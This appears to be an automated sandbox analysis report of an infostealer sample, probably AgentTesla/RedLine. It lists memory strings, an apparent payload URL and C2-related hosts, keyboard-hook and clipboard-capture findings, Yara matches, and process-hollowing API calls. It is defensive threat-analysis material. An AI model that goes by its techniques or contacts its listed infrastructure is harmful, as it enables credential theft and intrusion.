Source: x.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.dr	String found in binary or memory: http://www.pmail.com
Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/
Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/-
Source: Cllyjbrx.PIF, 00000010.00000002.2030287886.0000000020F7D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmng
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngHA
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngZ
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmngy
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com:443/origins/233_Cllyjbrxmng
Source: x.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com:443/origins/233_CllyjbrxmngP
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, SKTzxzsJw.cs

.Net Code: _71ZRqC1D

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif

Creates a window with clipboard capturing capabilities

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window created: window name: CLIPBRDWNDCLASS

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: x.exe PID: 4888, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Found large BAT file

Source: z1Transaction_ID_REF2418_cmd.bat

Static file information: 1139107

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8670 NtUnmapViewOfSection,	3_2_031D8670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8400 NtReadVirtualMemory,	3_2_031D8400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D7A2C NtAllocateVirtualMemory,	3_2_031D7A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D7D78 NtWriteVirtualMemory,	3_2_031D7D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	3_2_031D8D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	3_2_031DDD70
